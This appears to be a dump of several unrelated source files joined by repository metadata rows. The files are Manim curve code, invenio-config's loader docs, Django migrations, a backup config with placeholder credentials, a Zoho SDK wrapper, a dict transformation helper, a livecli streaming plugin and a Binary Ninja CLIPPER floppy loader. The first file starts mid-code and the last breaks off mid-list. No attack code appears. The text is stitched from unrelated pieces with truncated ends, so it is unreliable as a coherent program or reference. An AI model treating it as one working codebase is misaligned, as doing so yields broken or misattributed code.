alphas /= 1 - full_d_alpha + partial_d_alpha
self.add(
*[
vmobject.get_subcurve(alpha, alpha + partial_d_alpha)
for alpha in alphas[:-1]
]
)
# Family is already taken care of by get_subcurve
# implementation
if config.renderer == "opengl":
self.match_style(vmobject, recurse=False)
else:
self.match_style(vmobject, family=False)
| 34.297722
| 266
| 0.585831
|
514ba03cc63ab809bf94dc1ed018cf092b5aec5b
| 6,731
|
py
|
Python
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 4
|
2015-10-12T07:26:57.000Z
|
2017-10-22T00:30:54.000Z
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 28
|
2015-10-12T14:54:50.000Z
|
2020-12-03T15:02:17.000Z
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 25
|
2015-10-07T16:20:54.000Z
|
2021-11-25T09:42:43.000Z
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio configuration loader.
Invenio-Config is a *base package* of the Invenio digital library framework.
It is usually installed automatically as a dependency. It should facilitate
configuration loading from various sources to an application instance.
The following configuration loaders exists:
- :py:data:`invenio_config.default.InvenioConfigDefault` - ensure required
configuration values are set.
- :py:data:`invenio_config.module.InvenioConfigModule` - for loading
configuration from a Python module.
- :py:data:`invenio_config.entrypoint.InvenioConfigEntryPointModule` - for
loading configuration from a Python module specified by an entry point (by
default ``invenio_config.module``).
- :py:data:`invenio_config.folder.InvenioConfigInstanceFolder` - for loading
configuration from ``cfg`` file in an instance folder.
- :py:data:`invenio_config.env.InvenioConfigEnvironment` - for loading
configuration from environment variables with defined prefix (e.g.
``INVENIO_SECRET_KEY``).
It also includes configuration loader factory that it is used to merge these
sources in predefined order ensuring correct behavior in common scenarios.
Initialization
--------------
Following example needs a writable instance folder, hence we start by creating
a temporary directory.
>>> import tempfile
>>> tmppath = tempfile.mkdtemp()
.. testcode::
:hide:
import atexit
import shutil
atexit.register(lambda: shutil.rmtree(tmppath))
Now we can create a Flask application:
>>> from flask import Flask
>>> app = Flask('myapp', instance_path=tmppath, instance_relative_config=True)
Loaders
-------
You can check default configuration values in newly created ``app``.
>>> 'DEBUG' in app.config
True
>>> app.config.get('SECRET_KEY') is None
True
Default
~~~~~~~
The default configuration loader makes sure that the required configuration
values are always loaded. You should call it **after** all configuration
loaders have been already called.
The following default configuration values exist:
- :py:data:`SECRET_KEY` - A secret key that will be used for securely signing
the session cookie and can be used for any other security related needs.
- :py:data:`~invenio_config.default.ALLOWED_HTML_TAGS` - allowed tags used for
html sanitizing by bleach.
- :py:data:`~invenio_config.default.ALLOWED_HTML_ATTRS` - allowed attributes
used for html sanitizing by bleach.
The default configuration loader will warn if the ``SECRET_KEY`` is not
defined:
>>> import warnings
>>> from invenio_config import InvenioConfigDefault
>>> with warnings.catch_warnings(record=True) as w:
... config_default = InvenioConfigDefault(app=app)
... assert len(w) == 1
>>> app.config['SECRET_KEY']
'CHANGE_ME'
Module
~~~~~~
The module loader accepts an object and proxies the call to
:meth:`flask.Config.from_object`.
Here is an example of a configuration object:
>>> class Config:
... EXAMPLE = 'module'
>>> from invenio_config import InvenioConfigModule
>>> config_module = InvenioConfigModule(app=app, module=Config)
>>> app.config['EXAMPLE']
'module'
Entry point
~~~~~~~~~~~
The entry point loader works similar to the module loader, it just loads the
config module from the entry point ``invenio_config.module``:
>>> from invenio_config import InvenioConfigEntryPointModule
>>> config_ep = InvenioConfigEntryPointModule(app=app)
Instance Folder
~~~~~~~~~~~~~~~
The runtime configuration should be stored in a separate file, ideally located
outiside the actual application package. The configuration files are handled
as Python files where only variables in uppercase are stored in the application
config.
>>> import os
>>> from invenio_config import InvenioConfigInstanceFolder
>>> with open(os.path.join(tmppath, 'myapp.cfg'), 'w') as f:
... result = f.write("EXAMPLE = 'instance folder'")
>>> config_instance_folder = InvenioConfigInstanceFolder(app=app)
>>> app.config['EXAMPLE']
'instance folder'
Environment
~~~~~~~~~~~
Using environment variables is very handy when it comes to configuring
connections to services like database, Redis server, RabbitMQ, etc. used via
containers (e.g. Docker). In order to protect your application from reading
environment variables set by the system or other applications, you should
define a variable prefix used by the loader.
>>> os.environ['MYAPP_EXAMPLE'] = 'environment'
>>> from invenio_config import InvenioConfigEnvironment
>>> config_environment = InvenioConfigEnvironment(app=app, prefix='MYAPP_')
>>> app.config['EXAMPLE']
'environment'
You can also set more complex Python literal variables (e.g. dictionaries or
lists):
>>> os.environ['MYAPP_COMPLEX'] = "{'items': [{'num': 42}, {'foo': 'bar'}]}"
>>> # ...or export MYAPP_COMPLEX="{'items': [{'num': 42}, {'foo': 'bar'}]}"
>>> config_environment = InvenioConfigEnvironment(app=app, prefix='MYAPP_')
>>> app.config['COMPLEX']
{'items': [{'num': 42}, {'foo': 'bar'}]}
Factory Pattern
---------------
The Invenio-Config comes with an opinionated way of loading configuration,
that combines loaders in predictable way. You can use
:func:`invenio_config.utils.create_config_loader` if you would like to:
1. Load configuration from ``invenio_config.module`` entry point group.
2. Load configuration from ``config`` module if provided as argument.
3. Load configuration from the instance folder:
``<app.instance_path>/<app.name>.cfg``.
4. Load configuration keyword arguments provided.
5. Load configuration from environment variables with the prefix
``env_prefix``.
>>> from invenio_config import create_config_loader
>>> app = Flask('myapp', instance_path=tmppath, instance_relative_config=True)
>>> config_loader = create_config_loader(config=Config, env_prefix='MYAPP')
>>> config_loader(app=app, MYARG='config loader')
>>> app.config['EXAMPLE']
'environment'
>>> app.config['MYARG']
'config loader'
"""
from __future__ import absolute_import, print_function
from .default import InvenioConfigDefault
from .entrypoint import InvenioConfigEntryPointModule
from .env import InvenioConfigEnvironment
from .folder import InvenioConfigInstanceFolder
from .module import InvenioConfigModule
from .utils import create_conf_loader, create_config_loader
from .version import __version__
__all__ = (
'__version__',
'InvenioConfigDefault',
'InvenioConfigEntryPointModule',
'InvenioConfigEnvironment',
'InvenioConfigInstanceFolder',
'InvenioConfigModule',
'create_conf_loader',
'create_config_loader',
)
| 34.695876
| 79
| 0.756797
|
f8ac8655d090ff92d2b25abc70dca58017a2f82d
| 792
|
py
|
Python
|
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | 1
|
2019-01-24T01:02:55.000Z
|
2019-01-24T01:02:55.000Z
|
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | null | null | null |
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2017-12-12 13:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0010_auto_20171211_2354'),
]
operations = [
migrations.AlterField(
model_name='driverprofile',
name='gender',
field=models.TextField(blank=True, choices=[('Female', 'female'), ('Male', 'male'), ('Both', 'both'), ('None', 'non-specified')], default='None', max_length=50),
),
migrations.AlterField(
model_name='riderprofile',
name='gender',
field=models.CharField(blank=True, choices=[('Female', 'female'), ('Male', 'male'), ('Both', 'both'), ('None', 'non-specified')], default='None', max_length=30),
),
]
| 33
| 173
| 0.579545
|
a60cb361e13aa8af9a1d07f81d10939120a380f7
| 1,085
|
py
|
Python
|
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
from paramiko import RSAKey
ssh_client_options = {
'hosts_keys_filename': '/path/to/known_hosts',
}
routerboards = [
{
'name': 'router-identification',
'backup_options': {
'backups_directory': '/path/to/save/the/backup/files/with/trailing/slash/',
'assertion_options': {
'seconds_to_timeout': 10,
'minimum_size_in_bytes': 77
}
},
'backup_password': 'pass', # used to encrypt the .backup file
'credentials': {
'username': 'some_username',
'hostname': 'some_hostname_or_ip',
'port': 65535,
'pkey': RSAKey(filename='/path/to/private_key')
}
}
]
myauth = {
'backup_settings': {
'local_backups_directory': '/path/to/save/the/backup/files/with/trailing/slash/',
'remote_backups_directory': '/admin/backup/',
'keeping_backups_quantity': 7 # backups older then this number of days will be deleted from the server
},
'credentials': {
'username': 'some_username',
'hostname': 'some_hostname_or_ip',
'port': 65535,
'pkey': RSAKey(filename='/path/to/private_key')
}
}
| 27.125
| 107
| 0.645161
|
6fe56dcfbcfff4f3905e153e764bbeeed71f45c4
| 3,974
|
py
|
Python
|
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | null | null | null |
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | 7
|
2017-03-13T02:00:21.000Z
|
2018-01-02T04:03:02.000Z
|
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | 2
|
2017-02-16T02:18:21.000Z
|
2017-02-16T02:22:02.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-08-06 02:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0023_communicationslogentry_log_type'),
('applications', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Approval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_type', models.IntegerField(choices=[(1, 'Permit'), (2, 'Licence/permit'), (3, 'Part 5'), (4, 'Emergency works'), (5, 'Part 5 - Amendment Request'), (6, 'Part 5 - Amendment Application'), (7, 'Test - Application'), (8, 'Amend Permit'), (9, 'Amend Licence'), (10, 'Renew Permit'), (11, 'Renew Licence')])),
('title', models.CharField(max_length=254)),
('issue_date', models.DateField(auto_now_add=True, null=True)),
('start_date', models.DateField(blank=True, null=True)),
('expiry_date', models.DateField(blank=True, null=True)),
('status', models.IntegerField(choices=[(1, 'Current'), (2, 'Expired'), (3, 'Cancelled'), (4, 'Surrendered'), (5, 'Suspended'), (6, 'Reinstate')])),
('suspend_from_date', models.DateField(blank=True, null=True)),
('suspend_to_date', models.DateField(blank=True, null=True)),
('reinstate_date', models.DateField(blank=True, null=True)),
('cancellation_date', models.DateField(blank=True, null=True)),
('surrender_date', models.DateField(blank=True, null=True)),
('details', models.TextField(blank=True, null=True)),
('ammendment_application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ammendment_application', to='applications.Application')),
('applicant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='applicant_holder', to=settings.AUTH_USER_MODEL)),
('application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application', to='applications.Application')),
('approval_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval_document', to='applications.Record')),
('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='accounts.Organisation')),
],
),
migrations.CreateModel(
name='CommunicationApproval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comms_to', models.CharField(blank=True, max_length=256, null=True)),
('comms_from', models.CharField(blank=True, max_length=256, null=True)),
('subject', models.CharField(blank=True, max_length=256, null=True)),
('comms_type', models.IntegerField(choices=[(0, 'None'), (1, 'Phone'), (2, 'Email'), (3, 'Mail'), (4, 'System')], default=0)),
('details', models.TextField(blank=True, null=True)),
('state', models.IntegerField(blank=True, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approval', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='approvals.Approval')),
('records', models.ManyToManyField(blank=True, related_name='communication_approvals_docs', to='applications.Record')),
],
),
]
| 66.233333
| 326
| 0.632109
|
24a35c650f2156510cfae50959664263b5147484
| 2,149
|
py
|
Python
|
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.util import Constants
from zcrmsdk.src.com.zoho.crm.api.territories.response_handler import ResponseHandler
except Exception:
from ..exception import SDKException
from ..util import Constants
from .response_handler import ResponseHandler
class ResponseWrapper(ResponseHandler):
def __init__(self):
"""Creates an instance of ResponseWrapper"""
super().__init__()
self.__territories = None
self.__key_modified = dict()
def get_territories(self):
"""
The method to get the territories
Returns:
list: An instance of list
"""
return self.__territories
def set_territories(self, territories):
"""
The method to set the value to territories
Parameters:
territories (list) : An instance of list
"""
if territories is not None and not isinstance(territories, list):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: territories EXPECTED TYPE: list', None, None)
self.__territories = territories
self.__key_modified['territories'] = 1
def is_key_modified(self, key):
"""
The method to check if the user has modified the given key
Parameters:
key (string) : A string representing the key
Returns:
int: An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if key in self.__key_modified:
return self.__key_modified.get(key)
return None
def set_key_modified(self, key, modification):
"""
The method to mark the given key as modified
Parameters:
key (string) : A string representing the key
modification (int) : An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if modification is not None and not isinstance(modification, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: modification EXPECTED TYPE: int', None, None)
self.__key_modified[key] = modification
| 27.551282
| 100
| 0.741275
|
f07937b21d4b3652d451a10cb90fd13f131b8fbb
| 3,995
|
py
|
Python
|
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | null | null | null |
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | 90
|
2018-01-23T10:30:01.000Z
|
2019-01-31T10:53:42.000Z
|
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T14:16:23.000Z
|
2021-08-17T14:16:23.000Z
|
"""
This module defines classes that helps to transform dictionaries.
Their purpose is to simply mapping server to client classes and vice versa.
At a high level the following happens:
```
1. body_dict = request.get_json() # Read the request body as JSON, returning a dict
2. server_model = CreatePolicyServerModel.from_dict(body_dict) # The server
model needs to be created, since it does the validation
3. server_model_as_dict = server_model.to_dict()
4. client_model_dict = TheTransform.apply(server_model_as_dict)
5. client_model = CreatePolicyClientModel.from_dict(client_model_dict)
```
Note: Step 5 can also be written as
```
client_model = CreatePolicyClientModel(**client_model_dict)
```
The process for the response from the client is similar. The class returned
needs to be converted to a dictionary, transformed and used to construct the
server response class.
"""
import logging
LOGGER = logging.getLogger(__name__)
class Mapping(object):
"""
A class representing a mapping definition
The mapping will be applied to a dictionary field
"""
def __init__(self, input_field, output_field=None, conversion=None):
"""
:param input_field: The name of the field to transform
:param output_field: The name of the new field name that should be
used. If omitted, the name of the input field is used
:param conversion: A callable used to map the value. If None,
the value of the input field is copied verbatim.
"""
self.input_field = input_field
self.output_field = output_field or input_field
self.conversion = conversion
class Transformation(object):
"""
A transformation is a list of Mappings that can be applied to a dictionary.
"""
def __init__(self, mappings: [Mapping] = None,
copy_fields: [str] = None):
"""
:param mappings: Mappings for fields
:param copy_fields: Convenience mechanism for fields that should
only be copied.
"""
copy_fields = copy_fields or []
self._mappings = mappings or []
self._mappings.extend([Mapping(field) for field in copy_fields])
# Verify that there are no duplicate input field names specified
self._check_duplicates(
[mapping.input_field for mapping in self._mappings]
)
# Verify that there are no duplicate output field names specified
self._check_duplicates(
[mapping.output_field for mapping in self._mappings]
)
def apply(self, dictionary: dict) -> dict:
"""
Apply this transformation to the specified
:param dictionary: The dictionary to transform
:return: The transformed dictionary
"""
result = {}
for mapping in self._mappings:
if mapping.input_field in dictionary:
value = dictionary[mapping.input_field]
if value is None:
continue
if mapping.conversion is not None:
try:
value = mapping.conversion(value)
except Exception as e:
msg = "Field mapping failed with '{}'\n" \
"Field: '{}'\n" \
"Value: '{}'\n" \
"Conversion: {}".format(e, mapping.input_field,
value, mapping.conversion)
LOGGER.error(msg)
raise RuntimeError(msg)
result[mapping.output_field] = value
return result
def _check_duplicates(self, names):
# Verify that there are no duplicate field names specified
seen = set()
for name in names:
if name in seen:
raise RuntimeError("Field '{}' specified more than "
"once".format(name))
seen.add(name)
| 36.651376
| 84
| 0.614018
|
9f9ec788fac4fa80210c7d1b7fc51e71e8cb0db2
| 3,561
|
py
|
Python
|
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | 1
|
2019-12-04T11:54:52.000Z
|
2019-12-04T11:54:52.000Z
|
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | null | null | null |
src/livecli/plugins/tga.py
|
NghiemTrung/livecli
|
6a21b1b144b045963b6d1db8d4d8dc8471b62737
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
from livecli.plugin import Plugin
from livecli.plugin.api import http, validate
from livecli.stream import HLSStream, HTTPStream, RTMPStream
__livecli_docs__ = {
"domains": [
"star.longzhu.tv",
"star.longzhu.com",
],
"geo_blocked": [],
"notes": "",
"live": True,
"vod": False,
"last_update": "2017-02-17",
}
CHANNEL_INFO_URL = "http://api.plu.cn/tga/streams/%s"
QQ_STREAM_INFO_URL = "http://info.zb.qq.com/?cnlid=%d&cmd=2&stream=%d&system=1&sdtfrom=113"
PLU_STREAM_INFO_URL = "http://livestream.plu.cn/live/getlivePlayurl?roomId=%d"
_quality_re = re.compile(r"\d+x(\d+)$")
_url_re = re.compile(r"http://star\.longzhu\.(?:tv|com)/(m\/)?(?P<domain>[a-z0-9]+)")
_channel_schema = validate.Schema(
{
"data": validate.any(None, {
"channel": validate.any(None, {
"id": int,
"vid": int
})
})
},
validate.get("data")
)
_plu_schema = validate.Schema(
{
"playLines": [{
"urls": [{
"securityUrl": validate.url(scheme=validate.any("rtmp", "http")),
"resolution": validate.text,
"ext": validate.text
}]
}]
}
)
_qq_schema = validate.Schema(
{
validate.optional("playurl"): validate.url(scheme="http")
},
validate.get("playurl")
)
STREAM_WEIGHTS = {
"middle": 540,
"source": 1080
}
class Tga(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
@classmethod
def stream_weight(cls, stream):
if stream in STREAM_WEIGHTS:
return STREAM_WEIGHTS[stream], "tga"
return Plugin.stream_weight(stream)
def _get_quality(self, label):
match = _quality_re.search(label)
if match:
return match.group(1) + "p"
else:
return "live"
def _get_channel_id(self, domain):
channel_info = http.get(CHANNEL_INFO_URL % str(domain))
info = http.json(channel_info, schema=_channel_schema)
if info is None:
return 0, 0
return info['channel']['vid'], info['channel']['id']
def _get_qq_streams(self, vid):
res = http.get(QQ_STREAM_INFO_URL % (vid, 1))
info = http.json(res, schema=_qq_schema)
yield "live", HTTPStream(self.session, info)
res = http.get(QQ_STREAM_INFO_URL % (vid, 2))
info = http.json(res, schema=_qq_schema)
yield "live", HLSStream(self.session, info)
def _get_plu_streams(self, cid):
res = http.get(PLU_STREAM_INFO_URL % cid)
info = http.json(res, schema=_plu_schema)
for source in info["playLines"][0]["urls"]:
quality = self._get_quality(source["resolution"])
if source["ext"] == "m3u8":
yield quality, HLSStream(self.session, source["securityUrl"])
elif source["ext"] == "flv":
yield quality, HTTPStream(self.session, source["securityUrl"])
elif source["ext"] == "rtmp":
yield quality, RTMPStream(self.session, {
"rtmp": source["securityUrl"],
"live": True
})
def _get_streams(self):
match = _url_re.match(self.url)
domain = match.group('domain')
vid, cid = self._get_channel_id(domain)
if vid != 0:
return self._get_qq_streams(vid)
elif cid != 0:
return self._get_plu_streams(cid)
__plugin__ = Tga
| 27.820313
| 91
| 0.570626
|
61c292782fc63d0f9a1c216a95fcfa91d2603252
| 12,138
|
py
|
Python
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 5
|
2018-02-23T08:28:33.000Z
|
2022-01-10T10:40:25.000Z
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 1
|
2019-07-04T20:11:38.000Z
|
2019-07-04T20:11:38.000Z
|
disk.py
|
pmackinlay/binaryninja-clipper
|
dbf67a277398a06f740bccf9aee920f9c6e04a4e
|
[
"MIT"
] | 1
|
2018-04-08T20:43:47.000Z
|
2018-04-08T20:43:47.000Z
|
import struct
import traceback
from binaryninja.platform import Platform
from binaryninja.binaryview import BinaryView
from binaryninja.types import Symbol
from binaryninja.log import log_error, log_info
from binaryninja.enums import (SegmentFlag, SymbolType, SectionSemantics)
from unpack import unpack
# CLIPPER executables loaded from disk images. Currently only supports the
# Sapphire rebuild boot floppy (I/O system monitor and blue screen utilities)
# but should be extended to support others such as FDMDISK, etc.
# TODO:
# - inject unpacked data into parent view
# - refactor and complete hardware symbols
class BootFloppy(BinaryView):
name = 'InterPro Bootable Floppy'
long_name = 'InterPro Bootable Floppy'
def __init__(self, data):
BinaryView.__init__(self, parent_view = data, file_metadata = data.file)
@classmethod
def is_valid_for_data(self, data):
hdr = data.read(0, 4)
if len(hdr) < 4:
return False
if hdr[0:4] == 'sane':
return True
return False
def init(self):
self.platform = Platform['interpro-clipper']
self.unpacked = []
try:
# read floppy partition header: floppypar(4)
(magic, partition_count) = struct.unpack('<4sH', self.parent_view.read(0, 6))
for partition_number in range(partition_count):
# read partition information
(par, mod, start_block, end_block) = struct.unpack('<2B2H', self.parent_view.read(6 + partition_number * 6, 6))
log_info('par {:x}.{:x} start_block {} end_block {}'.format(par, mod, start_block, end_block))
# read partition boot block: bootheader(4)
(b_magic, b_checksum, b_processor, b_loadaddr, b_loadsize, b_uinitaddr, b_uinitsize, b_entry, b_time) = struct.unpack(
'<L2H6L', self.parent_view.read(start_block * 512, 32))
log_info(' b_magic 0x{:x} b_checksum 0x{:x} b_processor {} b_loadaddr 0x{:x} b_loadsize 0x{:x} b_uinitaddr 0x{:x} b_uinitsize 0x{:x} b_entry 0x{:x}'.format(
b_magic, b_checksum, b_processor, b_loadaddr, b_loadsize, b_uinitaddr, b_uinitsize, b_entry))
if par == 8 and b_processor == 1:
if mod == 0: # i/o system monitor
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
self.add_auto_segment(b_uinitaddr, b_uinitaddr, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), b_uinitaddr, b_uinitsize, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(b_entry)
elif mod == 2: # blue screen utility
# hard-coded lookup to find copied code block offset based on partition checksum
copy_lookup = {
0xe5c5:0x48d98, # C400
0xb0d0:0x4ed98 # CLIPPER
}
copy_offset = copy_lookup[b_checksum]
copy_size = b_loadsize - copy_offset
copy_address = 0x280000
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, copy_offset, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.boot'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
# copy loaded text
self.add_auto_segment(copy_address, copy_size, (start_block + 1) * 512 + copy_offset, copy_size, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), copy_address, copy_size, SectionSemantics.ReadOnlyCodeSectionSemantics)
# FIXME: for CLIPPER, the erased size should be copy_size + 0x69b00, unknown why
# create an unitialised data section directly after the copied data
self.add_auto_segment(copy_address + copy_size, 0x71450, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), copy_address + copy_size, 0x71450, SectionSemantics.ReadWriteDataSectionSemantics)
# the first 8 pages contain vectors and hard-coded page mappings
#self.add_auto_segment(0, 0x8000, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
#self.add_auto_section('vectors', 0x0, 0x8000, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(0x8000)
elif par == 0xa:
# Diagnostic disk partition allocation is as follows:
#
# sapphire1.flp sapphire2.flp sapphire2.flp
# mod content mod content mod content
# 0 FDMDISK
# 2 GT/GT+/GTII 2 EDGE II/II+
# 3 Digitizer
# 4 Token Ring
# 5 Hard PC
# 11 CLIPPER
# 12 Clock/Calendar
# 13 Ethernet
# 15 I/O Gate Array
# 16 Memory
# 17 Plotter
# 18 SCSI
# 19 Serial
if b_uinitsize > 0: # unpacked fdmdisk module
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable | SegmentFlag.SegmentExecutable)
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), b_loadaddr, b_loadsize, SectionSemantics.ReadOnlyCodeSectionSemantics)
self.add_auto_segment(b_uinitaddr, b_uinitsize, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), b_uinitaddr, b_uinitsize, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(b_entry)
elif mod not in [3,4,5]: # packed fdmdisk module (3, 4, and 5 use the same address range, so can't be loaded together)
# temporarily map the boot segment
self.add_auto_segment(b_loadaddr, b_loadsize, (start_block + 1) * 512, b_loadsize, SegmentFlag.SegmentContainsCode | SegmentFlag.SegmentReadable)
# read packed data offset, unpacked entry point and unpacked bss address/size
(packed_addr, unpacked_entry, unpacked_bss_addr, unpacked_bss_size) = struct.unpack('<4L', self.read(b_loadaddr, 16))
# read unpacked start address and packed length
(unpacked_addr, packed_size) = struct.unpack('<2L', self.read(packed_addr, 8))
sections = []
while packed_size > 0:
# unpack a block of packed data
unpacked_data = unpack(self.read(packed_addr + 8, packed_size))
log_info(' unpacked data addr 0x{:x} size 0x{:x}'.format(unpacked_addr, len(unpacked_data)))
# record the unpacked start address/end addresses and data
section = [x for x in sections if x[0] + len(x[1]) == unpacked_addr]
if len(section) == 1:
log_info(' merging with existing unpacked data {:x}'.format(section[0][0]))
section[0][1] += unpacked_data
else:
log_info(' creating new unpacked data range {:x} length {:x}'.format(unpacked_addr, len(unpacked_data)))
sections += [[unpacked_addr, unpacked_data]]
# find the next packed data block
packed_addr += (packed_size + 0x17) & ~0xf
(unpacked_addr, packed_size) = struct.unpack('<2L', self.read(packed_addr, 8))
# create sections
self.unpacked += sections
for unpacked in sections:
self.add_auto_section('{:x}.{:x}.text'.format(par, mod), unpacked[0], len(unpacked[1]), SectionSemantics.ReadOnlyCodeSectionSemantics)
# unmap the boot segment
self.remove_auto_segment(b_loadaddr, b_loadsize)
self.add_auto_segment(unpacked_bss_addr, unpacked_bss_size, 0, 0, SegmentFlag.SegmentContainsData | SegmentFlag.SegmentReadable | SegmentFlag.SegmentWritable)
self.add_auto_section('{:x}.{:x}.bss'.format(par, mod), unpacked_bss_addr, unpacked_bss_size, SectionSemantics.ReadWriteDataSectionSemantics)
self.add_entry_point(unpacked_entry)
# test symbol creation
for name,address in [
('timer2', 0x7f0fff5c),
('timer3', 0x7f0fff5e),
('scsi', 0x7f0fff60),
('floppy', 0x7f0fff62),
('plotter', 0x7f0fff64),
